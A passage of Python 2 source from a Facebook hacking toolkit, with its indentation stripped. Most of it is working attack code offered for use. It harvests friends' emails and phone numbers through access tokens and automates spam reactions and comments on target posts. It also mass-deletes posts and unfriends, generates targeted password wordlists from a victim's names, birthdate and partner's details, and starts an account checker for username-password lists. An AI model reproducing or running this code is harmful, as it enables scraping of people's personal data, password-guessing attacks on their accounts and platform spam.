print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
